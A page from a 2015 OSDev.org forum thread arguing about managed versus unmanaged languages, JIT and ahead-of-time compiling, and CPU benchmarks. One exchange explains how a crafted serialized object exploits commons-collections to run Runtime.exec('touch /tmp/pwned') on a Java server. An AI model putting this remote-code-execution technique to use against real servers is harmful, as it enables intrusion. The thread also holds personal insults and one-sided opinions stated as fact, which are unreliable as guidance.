OSDev.org

The Place to Start for Operating System Developers
It is currently Thu Apr 18, 2024 12:24 am

All times are UTC - 6 hours




Post new topic Reply to topic  [ 140 posts ]  Go to page Previous  1 ... 4, 5, 6, 7, 8, 9, 10  Next
Author Message
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Tue Nov 10, 2015 1:08 pm 
Offline
Member
Member
User avatar

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

embryo2 wrote:
Brendan wrote:
  • Most bugs (e.g. "printf("Hello Qorld\");") can't be detected by a managed environment, compiler or hardware; and therefore good software engineering practices (e.g. unit tests) are necessary

It's compile time detectable problem.


Please explain how it's possible for "bugs that can't be detected by a managed environment, compiler or hardware" to be detected by a compiler.

Surely if any of these bugs could be detected by a compiler; they wouldn't be "bugs that can't be detected by a managed environment, compiler or hardware" in the first place.

embryo2 wrote:
Brendan wrote:
  • Languages and compilers can be designed to detect a lot more bugs during "ahead of time" compiling; and the design of languages like C and C++ prevent compilers for these languages from being good at detecting bugs during "ahead of time" compiling, but this is a characteristic of the languages and not a characteristic imposed by "unmanaged", and unmanaged languages do exist that are far better (but not necessarily ideal) at detecting/preventing bugs during "ahead of time" compiling (e.g. Rust).

Ahead of time doesn't solve the problem of runtime bugs. And security also can be compromised.


Ahead of time compiling doesn't solve the problem of run-time bugs in isolation; but I was not suggesting that ahead of time compiling should be used in isolation.

embryo2 wrote:
Brendan wrote:
  • Bugs in everything; including "ahead of time" compilers, JIT compilers, kernels and hardware itself; all mean that hardware protection (designed to protect processes from each other, and to protect the kernel from processes) is necessary when security is needed (or necessary for everything, except extremely rare cases like embedded systems and games consoles where software can't modify anything that is persisted and there's no networking)

Hardware protection requires time, power and silicon. Software protection can require less time, power and silicon.


Software protection requires.... hardware that's able to execute software (which requires time, power and silicon).

embryo2 wrote:
Brendan wrote:
  • The combination of good software engineering practices, well designed language and hardware protection mean that the benefits of performing additional checks in software at run-time (a managed environment) is near zero even when the run-time checking is both exhaustive and perfect, because everything else detects or would detect the vast majority of bugs anyway.

The proposed combination is too far from achieving stated goal of "near zero benefits" of runtime checks.


Why (was there a flaw in my reasoning that you haven't mentioned)?

embryo2 wrote:
Brendan wrote:
  • "Exhaustive and perfect" is virtually impossible; which means that the benefits of performing additional checks in software at run-time (a managed environment) is less than "near zero" in practice, and far more likely to be negative (in that the managed environment is more likely to introduce bugs of its own than to find bugs)

It's negative until more smart compilers are released. It's only matter of time (not so great time).


Um, what? If a smart compiler was able to guarantee there are no bugs in the managed environment itself; then a smart compiler could guarantee there's no bugs in normal applications too (which would make a managed environment pointless).

embryo2 wrote:
Brendan wrote:
  • The "near zero or worse" benefits of managed environments do not justify the increased overhead caused by performing additional checks in software at run-time

Safeness and security justify the increase.


Zero additional safety and zero additional security doesn't even justify a lollipop.

embryo2 wrote:
Brendan wrote:
  • Where performance is irrelevant (specifically, during testing done before software is released) managed environments may be beneficial; but this never applies to released software.

It applies to released software also because the issues of safeness and security are still important.


No; if you release software that has safeness and security problems then you've already failed; and you should probably get a job as a web developer instead of working on useful software (so that people know you qualify when they're preparing that amazing vacation to the centre of the sun).

embryo2 wrote:
Brendan wrote:
  • Languages that are restricted for the purpose of allowing additional checks in software at run-time to be performed ("managed languages"); including things like not allowing raw pointers, not allowing assembly language, not allowing explicit memory management, not allowing self modifying code and/or not allowing dynamic code generation; prevent software from being as efficient as possible

If the efficiency is of a paramount importance we can buy trusted sources of the efficient software and because of the nature of trust we can safely tell the managed environment to compile the code without safety checks and with the attention to the developer's performance related annotations. Next it runs the code under hardware protection. And next after we have tested some software usage patterns we can safely remove even hardware protection for every tested pattern and obtain even better performance.


Basically; in an ill-fated attempt at showing that "managed" isn't a pathetic joke, you suggest using "unmanaged" as an alternative?

embryo2 wrote:
Brendan wrote:
  • Software written in a managed language but executed in an unmanaged language (without the overhead of run-time checking) is also prevented from being as efficient as possible by the restrictions imposed by the managed language

Restrictions can be circumvented by the means described above.


Security measures can be circumvented by the means described above? Nice... :roll:

embryo2 wrote:
Brendan wrote:
  • General purpose code can not be designed for a specific purpose by definition; and therefore can not be optimal for any specific purpose. This effects libraries for both managed languages and unmanaged languages alike.

Is the integer addition (x+y) operation a general purpose one? Is it implemented inefficiently in case of JIT?


How many libraries does Java provide to do integer addition (x+y)? Are there more than 4 of these libraries?

embryo2 wrote:
Brendan wrote:
  • Large libraries and/or frameworks improve development time by sacrificing the quality of the end product (because general purpose code can not be designed for a specific purpose by definition).

Here is the place for aggressive inlining and other similar technics. But the code should be in a compatible form, like bytecode.


I'm not talking about trivial/common optimisations that all compilers do anyway; I'm talking about things like (e.g.) choosing insertion sort because you know that for your specific case the data is always "nearly sorted" beforehand (and not just using a generic quicksort that's worse for your special case just because that's what a general purpose library happened to shove in your face).

embryo2 wrote:
Brendan wrote:
  • For most (not all) things that libraries are used for; for both managed and unmanaged languages the programmer has the option of ignoring the library's general purpose code and writing code specifically for their specific case. For managed languages libraries are often native code (to avoid the overhead of "managed", which is likely the reason managed languages tend to come with massive libraries/frameworks) and if a programmer chooses to write the code themselves they begin with a huge disadvantage (they can't avoid the overhead of "managed" like the library did) and their special purpose code will probably never beat the general purpose native code. For an unmanaged language the programmer can choose to write the code themselves (and avoid sacrificing performance for the sake of developer time) without that huge disadvantage.

If the performance is important and the environment's compiler is still too weak and there's some mechanism of trust between a developer and a user, then the developer is perfectly free to implement any possible optimization tricks.


I'm glad that you agree that "managed" is useless and we should all use "unmanaged" (and the optimisation tricks it makes possible) for anything important.

embryo2 wrote:
Brendan wrote:
  • To achieve optimal performance and reduce "programmer error"; a programmer has to know what effect their code actually has at the lowest levels (e.g. what their code actually asks the CPU/s to do). Higher level languages make it harder for programmers to know what effect their code has at the lowest levels; and are therefore a barrier preventing both performance and correctness. This applies to managed and unmanaged languages alike. Note: as a general rule of thumb; if you're not able to accurately estimate "cache lines touched" without compiling, executing or profiling; then you're not adequately aware of what your code does at the lower levels.

If a developer faces some bottleneck and it's important then he usually digs deep enough to find the root cause. So, all your "harder for programmer to know" is for beginners only.


If a developer faces some bottleneck and it's important, then he usually digs deep enough to find that root cause is "managed".

embryo2 wrote:
Brendan wrote:
  • The fact that higher level languages are a barrier preventing both performance and correctness is only partially mitigated through the use of highly tuned ("optimised for no specific case") libraries.

Optimized libraries aren't the only way. The developer experience is much preferable solution.


I don't know if you mean "the developer's experience level" (e.g. how skilled they are) or "the developer experience" (e.g. whether they have nice tools/IDE, pair of good/large monitors and a comfortable chair); and for both of these possibilities I don't know how it helps them understand things that higher level languages are deliberately designed to abstract.

embryo2 wrote:
Brendan wrote:
  • Portability is almost always desirable

So, just use bytecode.
Brendan wrote:
  • Source code portability (traditionally used by languages like C and C++) causes copyright concerns for anything not intended as open source, which makes it a "less preferable" way to achieve portability for a large number of developers. To work around this developers of "not open source" software provide pre-compiled native executables. Pre-compiled native executables can't be optimised specifically for the end user's hardware/CPUs unless the developer provides thousands of versions of the pre-compiled native executables, which is extremely impractical. The end result is that users end up with poorly optimised software.

Copyright concerns can be avoided using dowloadable software. Just select your platform and get the best performance. But the trust should exist there. So, any copyrighter now can exploit user's inability to protect themselves, but in case of managed the environment takes care of using hardware protection or even emulating the hardware to detect potential threat.


I have 2 computers and both are 64-bit 80x86.

One has 2.8 GHz CPUs with 1300 MHz RAM and for this combination the ideal prefetch scheduling distance is 160 cycles. The other has 3.5 GHz CPUs with 1600 MHz RAM and for this combination the ideal prefetch scheduling distance is 200 cycles. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance?

One has 2 physical chips (and NUMA) with 4 cores per chip and hyperthreading (16 logical CPUs total) and 12 GiB of RAM (6 GiB per NUMA domain). The other has a single physical quad-core chip (8 logical CPUs total) and 32 GiB of RAM without NUMA. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance and the differences in memory subsystems, number of NUMA domains, chips, cores, etc?

One supports AVX2.0 and the other doesn't support AVX at all. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance, and the differences in memory subsystems (and number of NUMA domains, chips, cores, etc), and which SIMD extensions are/aren't supported?

embryo2 wrote:
Brendan wrote:
  • Various optimisations are expensive (e.g. even for fundamental things like register allocation finding the ideal solution is prohibitively expensive); and JIT compiling leads to a run-time compromise between the expense of performing the optimisation and the benefits of performing the optimisation. An ahead of time compiler has no such compromise and therefore can use much more expensive optimisations and can optimise better (especially if it's able to optimise for the specific hardware/CPUs).

There's no compromise. The environment can decide when to use JIT or AOT.


Sure - while the software is running and being JIT compiled, the environment decides "Oh, I should use AOT for this next part", travels backwards in time until 5 minutes before the software started running, does ahead of time compiling, then travels forward in time and switches to AOT. I have no idea why this hasn't been implemented before! :roll:

embryo2 wrote:
Brendan wrote:
  • There are massive problems with the tool-chains for popular unmanaged languages (e.g. C and C++) that prevent effective optimisation (specifically; splitting a program into object files and optimising them in isolation prevents a huge number of opportunities, and trying to optimise at link time after important information has been discarded also prevents a huge number of opportunities). Note that this is a restriction of typical tools, not a restriction of the languages or environments.

Well, yes, we need to get rid of unmanaged :)


We need to get rid of C and C++ because they make unmanaged seem far worse than it should (for multiple reasons).

embryo2 wrote:
Brendan wrote:
  • Popular JIT compiled languages are typically able to get close to the performance of popular "compiled to native" unmanaged languages because these "compiled to native" unmanaged languages have both the "not optimised specifically for the specific hardware/CPUs" problem and the "effective optimisation prevented by the tool-chain" problem.

So, the unmanaged sucks despite all your claims above.


Most existing unmanaged languages suck, but their problems have nothing to do with "unmanaged" and are relatively easy to fix or avoid. Most managed languages also suck, but their problems have everything to do with "managed" and can't be fixed or avoided.

embryo2 wrote:
Brendan wrote:
  • "Ahead of time" compiling from byte-code to native on the end user's machine (e.g. when the end user installs software) provides portability without causing the performance problems of JIT and without causing the performance problems that popular unmanaged languages have.

AOT is important part of the managed environment.


AOT may or may not be an important part of a managed environment; but this has nothing to do with using 2 AOT compilers (one before software is deployed and the other after/while software is installed by the end user) to solve portability and performance/optimisation and copyright problems in traditional unmanaged toolchains.

embryo2 wrote:
Brendan wrote:
In other words; the best solution is an unmanaged language that is designed to detect as many bugs as possible during "source to byte code" compiling that does not prevent "unsafe" things (if needed), combined with an ahead of time "byte code to native" compiler on the end user's computer; where the resulting native code is executed in an unmanaged environment with hardware protection.

The best solution is managed environment with many option available including JIT, AOT, hardware protected sessions and of course - the best ever smart compiler.


Can you back this up with logical reasoning?


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:04 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Brendan wrote:
embryo2 wrote:
Brendan wrote:
Airbags exists to protect against user error, not to protect against design flaws.

Is the car's speed a design flaw?


It's a design requirement - a car that doesn't move is an ornament and not a car at all.

It means we have to protect users from speed related accidents. So, the protection is implemented in form of an airbag. And it isn't about user errors. It's about user's inability to predict the future.
Brendan wrote:
It's extremely difficult for people to reason about software if/when it's doing many things simultaneously; and so all CPUs (including Intel's and everyone else's) have to emulate "one step at a time" so that they're usable (even if they don't actually do "one step at a time" internally).

Compilers split code into independent parts. And humans write the code sequentially. No problem here. Intel's processors just add hardware based compiler for human readable assembly. But hardware based compiler is an obvious trash because it lacks memory and time, available for software compiler.
Brendan wrote:
embryo2 wrote:
Brendan wrote:
In my case, the kernel provides exception handlers to handle it (e.g. by adding info to a log and terminating the process) and there's no additional bloat in the process itself to explictly handle problems that shouldn't happen.

It doesn't prevent the process from having the implicit handling of "additional bloat". Do you know how electronic gates work? Can you show a magical schematic with the ability of skipping bit value check or setting input levels according to the variable's value in memory?


If an exception (e.g. page fault) occurs and the kernel responds by terminating the process immediately; no stupid bloat for handling this condition (or any similar condition) is possible in any process at all.

I don't see how the remainder of your reply (gates? schematics?) relates to what its replying to.

For the processor to know that anything is happened it should execute an operation which detects the interesting part of processor's state. So, "additional bloat" here is the detection part of processor's work. It just should be done despite of anything. It's unavoidable. And your point - this part of work always should be implemented in hardware. My point - it's bad idea to hardcode an algorithm in hardware because it' too inflexible.
Brendan wrote:
I very much doubt that we're using the same definition of competence. For things like smartphone app development and web development (which is far worse) the inherent inefficiency means that a person must be willing to sacrifice the quality of the end product for the sake of "rapid turd shovelling". This sacrifice is only possible for people who have a severe lack of pride in their work or are unable to recognise the inefficiencies; and lack of pride in your work and/or an inability to recognise and avoid inefficiency is how I define incompetence.

The efficiency here is measured in terms of "time to market", but not in terms of "after a year we finally managed to save 1% of processor's time".
Brendan wrote:
Fortunately bloatware only runs the small part of the planet that (I assume) you're permanently stuck in.

Internet is run by Java at best. At worst it's different forms of scripts like PHP or something even uglier. And only very small part of internet is run by things like Apache HTTP server.
Brendan wrote:
Heh - a web server is "OS level code" now?!?

Deep optimization always was the OS level work.
Brendan wrote:
I only saw this list of benchmark results. There isn't a single 80x86 benchmark at all!

Yes. And do you still think your claim about underperfomance of ARM based 64-bit solutions is supported by any sane benchmark?
Brendan wrote:
You deliberately chose a "PC only" benchmark; and shouldn't be surprised that you get benchmark results for PCs. You also deliberately chose to ignore the benchmarks that the industry uses (like SPECint and SPEC2006) that I mentioned.

Well, I glanced at this page. And what? A few SPARC processors drowned among thousands of Intel compatible chips. There's no ARM. And your claim about ARM's underperformance is still questioned.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:09 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
You don't have to read the entire page from start to finish. You can skip to the parts that describe the exploit (and the links where the exploit is described in further detail).

If I skip these parts then I will be unable to understand how it works.
Octocontrabass wrote:
All of the classes used in the exploit are part of the application being exploited. More specifically, they are all part of commons-collections, which is a component of all of the exploited applications. The remote attacker needs no access to the server's filesystem, because the vulnerable code is already there.

You can download the commons-collections sources from here. Next you can grep the archive for "touch /tmp/pwned". And after you will find there's no such code it is interesting to hear from you where from the JVM can get it?

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:19 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Schol-R-LEA wrote:
embryo2 wrote:
Brendan wrote:
Most bugs (e.g. "printf("Hello Qorld\");") can't be detected by a managed environment, compiler or hardware; and therefore good software engineering practices (e.g. unit tests) are necessary

It's compile time detectable problem.

Wait a moment, are you claiming that the compiler (as opposed to the editor or IDE) should be not only incorporate a spell checker for strings, but also be able to detect a spelling error in a string (e.g., "Qorld" instead of "World")

There's escaped quotation mark which makes string literal endless.

May be Brendan was kidding giving us double troubled code. Or may be Brendan accidentally made this compiler detectable bug (despite his claims of being very careful developer).
Schol-R-LEA wrote:
To be fair, I suspect the Embryo simply chose the page as being the first one found in a Google search on the phrase 'CPU benchmark', without looking critically at what was actually presented or understanding the nuances of benchmarking

Yes. I had no intention to make a thorough examination of many internet pages just because a tiny percent of them can prove Brendan's point of view. I see what an ordinary user sees - there's no sane comparison between Intel and ARM processors.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:48 am 
Offline
Member
Member

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5137
embryo2 wrote:
If I skip these parts then I will be unable to understand how it works.

The authors give a more thorough explanation than I can.

embryo2 wrote:
You can download the commons-collections sources from here. Next you can grep the archive for "touch /tmp/pwned". And after you will find there's no such code it is interesting to hear from you where from the JVM can get it?

The JVM receives the malicious code from the remote attacker, embedded in a serialized object. The serialized object is crafted to exploit a vulnerability in commons-collections that allows it to execute arbitrary code.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:56 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Brendan wrote:
Ahead of time compiling doesn't solve the problem of run-time bugs in isolation; but I was not suggesting that ahead of time compiling should be used in isolation.

Yes, it should be used in conjunction with managed environment.
Brendan wrote:
Software protection requires.... hardware that's able to execute software (which requires time, power and silicon).

Yes, just like hardware protection requires hardware that's able to execute software (which requires time, power and silicon)
Brendan wrote:
embryo2 wrote:
Brendan wrote:
  • The combination of good software engineering practices, well designed language and hardware protection mean that the benefits of performing additional checks in software at run-time (a managed environment) is near zero even when the run-time checking is both exhaustive and perfect, because everything else detects or would detect the vast majority of bugs anyway.

The proposed combination is too far from achieving stated goal of "near zero benefits" of runtime checks.


Why (was there a flaw in my reasoning that you haven't mentioned)?

The flaw can be described as "$hit happens". Compiler is unable to detect all bugs. Extensive testing is unable to detect all bugs. Good software design methodology is unable to prevent all bugs. And so on. Systems are really complex and the complexity prevents us from finding a simple way of developing bug free software, that's why we can check results at run time and increase it's reliability. Yes, it adds some redundancy, but is solves the problem. A car can run without airbag, but people prefer to have one (at least) even if it will be useless all the car's life time.
Brendan wrote:
embryo2 wrote:
Brendan wrote:
  • "Exhaustive and perfect" is virtually impossible; which means that the benefits of performing additional checks in software at run-time (a managed environment) is less than "near zero" in practice, and far more likely to be negative (in that the managed environment is more likely to introduce bugs of its own than to find bugs)

It's negative until more smart compilers are released. It's only matter of time (not so great time).


Um, what? If a smart compiler was able to guarantee there are no bugs in the managed environment itself; then a smart compiler could guarantee there's no bugs in normal applications too (which would make a managed environment pointless).

Read carefully - it's about negative benefits.
Brendan wrote:
if you release software that has safeness and security problems then you've already failed;

Ok, I failed. But aren't you too? Who on earth makes no bugs? Or who on earth spends lifes for delivering some small, but bug free solution?
Brendan wrote:
and you should probably get a job as a web developer instead of working on useful software (so that people know you qualify when they're preparing that amazing vacation to the centre of the sun).

Yes, people pay for my vacations because I qualify for being productive.
Brendan wrote:
embryo2 wrote:
Brendan wrote:
  • Software written in a managed language but executed in an unmanaged language (without the overhead of run-time checking) is also prevented from being as efficient as possible by the restrictions imposed by the managed language

Restrictions can be circumvented by the means described above.


Security measures can be circumvented by the means described above? Nice... :roll:

No, it's about restrictions imposed by the managed language, read it carefully, please.
Brendan wrote:
How many libraries does Java provide to do integer addition (x+y)? Are there more than 4 of these libraries?

There's just one JVM which translates the x+y into a form of "add" instruction.
Brendan wrote:
I'm talking about things like (e.g.) choosing insertion sort because you know that for your specific case the data is always "nearly sorted" beforehand (and not just using a generic quicksort that's worse for your special case just because that's what a general purpose library happened to shove in your face).

Algorithm selection is not easy. But compilers are already able to select some algorithms. In the future the selection set can be extended greatly.
Brendan wrote:
I don't know if you mean "the developer's experience level" (e.g. how skilled they are) or "the developer experience" (e.g. whether they have nice tools/IDE, pair of good/large monitors and a comfortable chair);

May be the latter can be designated as "the development experience"? But anyway, the addition of "level" really helps.
Brendan wrote:
and for both of these possibilities I don't know how it helps them understand things that higher level languages are deliberately designed to abstract.

Yes, they are designed. But human being was designed to understand his tools.
Brendan wrote:
I have 2 computers and both are 64-bit 80x86.

One has 2.8 GHz CPUs with 1300 MHz RAM and for this combination the ideal prefetch scheduling distance is 160 cycles. The other has 3.5 GHz CPUs with 1600 MHz RAM and for this combination the ideal prefetch scheduling distance is 200 cycles. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance?

One has 2 physical chips (and NUMA) with 4 cores per chip and hyperthreading (16 logical CPUs total) and 12 GiB of RAM (6 GiB per NUMA domain). The other has a single physical quad-core chip (8 logical CPUs total) and 32 GiB of RAM without NUMA. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance and the differences in memory subsystems, number of NUMA domains, chips, cores, etc?

One supports AVX2.0 and the other doesn't support AVX at all. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance, and the differences in memory subsystems (and number of NUMA domains, chips, cores, etc), and which SIMD extensions are/aren't supported?

Do you think it will be unsolvable problem for you to decide how to ask a user about his hardware?
Brendan wrote:
AOT may or may not be an important part of a managed environment; but this has nothing to do with using 2 AOT compilers (one before software is deployed and the other after/while software is installed by the end user) to solve portability and performance/optimisation and copyright problems in traditional unmanaged toolchains.

You introduce useless entities. It was shown how one AOT can help, your second AOT is useless.
Brendan wrote:
embryo2 wrote:
The best solution is managed environment with many option available including JIT, AOT, hardware protected sessions and of course - the best ever smart compiler.


Can you back this up with logical reasoning?

Every option has advantages. If we can use an advantage we can do our work better. So, it's obvious it's better to have the options that allow us to have advantages. And it's better to have a bag (the environment) for all these options (because it's very impractical to work with every option separately).

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 5:08 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
The JVM receives the malicious code from the remote attacker, embedded in a serialized object. The serialized object is crafted to exploit a vulnerability in commons-collections that allows it to execute arbitrary code.

Well, now you have jumped to the "second option" from the option set of only one option :)

JVM receives just class name and it's data (field values). Next JVM looks for the class using it's name. Next JVM instantiates the class. Next JVM passes the class to the generic deserializer. Next deserializer uses class definition to tell the JVM what method to run. Have you noticed the need for the class? Where from the JVM can get it? Have you noticed there's no place for objects data yet? It's irrelevant what payload has except the class name.

Well, may be it's good idea to ask the article's author how he managed to not notice such important problem as file system access?

But in fact the author mumbles a bit about "if it's not this way then it's impossible". However, every person here just missed such mumbling (me included, my first reading missed these words). So - it's just obfuscated trash.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 5:31 am 
Offline
Member
Member

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5137
embryo2 wrote:
JVM receives just class name and it's data (field values). Next JVM looks for the class using it's name. Next JVM instantiates the class. Next JVM passes the class to the generic deserializer. Next deserializer uses class definition to tell the JVM what method to run. Have you noticed the need for the class? Where from the JVM can get it? Have you noticed there's no place for objects data yet? It's irrelevant what payload has except the class name.

The payload relies on the fact that the object being unserialized can specify methods to invoke, due to a vulnerability in commons-collections. One of the methods it invokes is Runtime.exec("touch /tmp/pwned").

embryo2 wrote:
Well, may be it's good idea to ask the article's author how he managed to not notice such important problem as file system access?

Good idea. I'm sure the author can explain the vulnerability much better than I can.

embryo2 wrote:
But in fact the author mumbles a bit about "if it's not this way then it's impossible".

Can you specify exactly where the author states this?


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 8:57 am 
Offline
Member
Member
User avatar

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

embryo2 wrote:
Brendan wrote:
Ahead of time compiling doesn't solve the problem of run-time bugs in isolation; but I was not suggesting that ahead of time compiling should be used in isolation.

Yes, it should be used in conjunction with managed environment.


Why would anyone be stupid enough to use a managed environment to reduce performance and increase the risk of bugs and security problems?

embryo2 wrote:
Brendan wrote:
Software protection requires.... hardware that's able to execute software (which requires time, power and silicon).

Yes, just like hardware protection requires hardware that's able to execute software (which requires time, power and silicon)


Erm. In case you missed my point; using software (that requires hardware) in attempt to avoid using hardware is completely idiotic because you're not avoiding the use of hardware at all (and are using even more hardware, and making the problem you're trying to prevent even worse).

It's like a doctor telling a morbidly obese patient that they have to stop eating a few pieces of bacon for breakfast because there's too many calories (which are bad) and they should eat 20 large bowls of caramel ice-cream (with extra chocolate topping) per day instead.

embryo2 wrote:
Brendan wrote:
Why (was there a flaw in my reasoning that you haven't mentioned)?

The flaw can be described as "$hit happens". Compiler is unable to detect all bugs. Extensive testing is unable to detect all bugs. Good software design methodology is unable to prevent all bugs. And so on. Systems are really complex and the complexity prevents us from finding a simple way of developing bug free software, that's why we can check results at run time and increase it's reliability. Yes, it adds some redundancy, but is solves the problem. A car can run without airbag, but people prefer to have one (at least) even if it will be useless all the car's life time.


Here's an idea: Because "$hit happens", let's use a random number generator to trash an executable's code when each process is started! It won't help (just like "managed environment" won't help) and it will make everything worse (just like "managed environment" makes everything worse), but at least we can pretend we tried!

embryo2 wrote:
Brendan wrote:
embryo2 wrote:
It's negative until more smart compilers are released. It's only matter of time (not so great time).


Um, what? If a smart compiler was able to guarantee there are no bugs in the managed environment itself; then a smart compiler could guarantee there's no bugs in normal applications too (which would make a managed environment pointless).

Read carefully - it's about negative benefits.


Erm, OK, I've read carefully now...

If a smart compiler was able to guarantee there are no "negative benefits" in the managed environment itself; then a smart compiler could guarantee there's no "negative benefits" in normal applications too (which would make a managed environment pointless).

embryo2 wrote:
Brendan wrote:
if you release software that has safeness and security problems then you've already failed;

Ok, I failed. But aren't you too? Who on earth makes no bugs? Or who on earth spends lifes for delivering some small, but bug free solution?


As I've explained repeatedly over the course of about 6 months in multiple topics; yes there will be bugs; but no, a managed environment does nothing at all to help and is incredibly pointless and stupid (primarily because there are far better and more effective ways of finding and mitigating the bugs, and these better/more effective ways are all necessary anyway).

Please note that your failure to learn anything (and/or your constant failure to propose any rational explanation for your stupidity) indicates that you will remain incompetent and ignorant until the day you die; and that talking to you is most likely a complete and utter waste of my time. You simply lack the intelligence necessary to justify your uninformed and misled opinion; so you resort to repeating the same flawed assumptions while ignoring all common sense.

embryo2 wrote:
Brendan wrote:
  • Software written in a managed language but executed in an unmanaged language (without the overhead of run-time checking) is also prevented from being as efficient as possible by the restrictions imposed by the managed language

embryo2 wrote:
Restrictions can be circumvented by the means described above.

Brendan wrote:
Security measures can be circumvented by the means described above? Nice... :roll:

No, it's about restrictions imposed by the managed language, read it carefully, please.


You can't avoid the restrictions without also avoiding the security measures; so neither can be avoided unless both are avoided.

Note that I am not disagreeing with you here. Because managed languages serve no useful purpose, I do agree that both the restrictions they cause and the security measures they fail to provide can be discarded without consequence.

embryo2 wrote:
Brendan wrote:
    General purpose code can not be designed for a specific purpose by definition; and therefore can not be optimal for any specific purpose. This effects libraries for both managed languages and unmanaged languages alike.

Is the integer addition (x+y) operation a general purpose one? Is it implemented inefficiently in case of JIT?
Brendan wrote:
How many libraries does Java provide to do integer addition (x+y)? Are there more than 4 of these libraries?

There's just one JVM which translates the x+y into a form of "add" instruction.


So you're saying that your (x+y) has nothing at all to do with libraries, and therefore has nothing to do with general purpose code provided by libraries being "less optimal" for a specific purposes?

embryo2 wrote:
Brendan wrote:
I'm talking about things like (e.g.) choosing insertion sort because you know that for your specific case the data is always "nearly sorted" beforehand (and not just using a generic quicksort that's worse for your special case just because that's what a general purpose library happened to shove in your face).

Algorithm selection is not easy. But compilers are already able to select some algorithms. In the future the selection set can be extended greatly.


In your magic pipe-dream future; all programmers will spend all their time adding to the libraries and maintaining them, just so people who aren't programmers can do things like (e.g.) "#include <web_browser>" whenever they want to pretend they wrote a new web browser.

embryo2 wrote:
Brendan wrote:
I don't know if you mean "the developer's experience level" (e.g. how skilled they are) or "the developer experience" (e.g. whether they have nice tools/IDE, pair of good/large monitors and a comfortable chair);

May be the latter can be designated as "the development experience"? But anyway, the addition of "level" really helps.
Brendan wrote:
and for both of these possibilities I don't know how it helps them understand things that higher level languages are deliberately designed to abstract.

Yes, they are designed. But human being was designed to understand his tools.


So we're designing tools that deliberately hide/abstract lower level details; then saying that developers don't have enough experience when they don't know the lower level details that our tools have deliberately hidden; and then trying to pretend this "helps" the developer?

embryo2 wrote:
Brendan wrote:
I have 2 computers and both are 64-bit 80x86.

One has 2.8 GHz CPUs with 1300 MHz RAM and for this combination the ideal prefetch scheduling distance is 160 cycles. The other has 3.5 GHz CPUs with 1600 MHz RAM and for this combination the ideal prefetch scheduling distance is 200 cycles. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance?

One has 2 physical chips (and NUMA) with 4 cores per chip and hyperthreading (16 logical CPUs total) and 12 GiB of RAM (6 GiB per NUMA domain). The other has a single physical quad-core chip (8 logical CPUs total) and 32 GiB of RAM without NUMA. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance and the differences in memory subsystems, number of NUMA domains, chips, cores, etc?

One supports AVX2.0 and the other doesn't support AVX at all. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance, and the differences in memory subsystems (and number of NUMA domains, chips, cores, etc), and which SIMD extensions are/aren't supported?

Do you think it will be unsolvable problem for you to decide how to ask a user about his hardware?


I tried to make it obvious how stupid this idea is, and you still weren't able to understand my point, so let me try again.

With just one Intel CPU (e.g. "Core i7 4770") there's maybe 4 different RAM speeds to worry about and maybe 8 different "total RAM" sizes. That adds up to 32 possible permutations for one specific Intel CPU alone. There are around 300 different Intel CPUs that support long mode. This gives 9600 permutations. For AMD and VIA there's probably about 100 more CPUs capable of long mode, so that takes us up to about 12800 permutations. However, some of these CPUs can be overclocked, so it's probably more like 14000 permutations. Also (especially for Xeons and Opterons) a computer might have one physical chip, or 2 or 4 or more physical chips (and various forms of NUMA and whatever else). This means it's probably much closer to 18000 permutations.

That's just 80x86 CPUs that support long mode. If you also include 32-bit 80x86 CPUs you can probably double that to 36000 permutations for "all 80x86 alone". Then there's ARM, SPARC, PowerPC, Itanium, MIPS, etc. For a rough estimate, you might be looking at a total of 50000 permutations.

If it takes 10 minutes to compile one variation and you've got a computer running 24 hours per day without stopping, it'd take almost an entire year (347 days) to compile all 50000 variations.

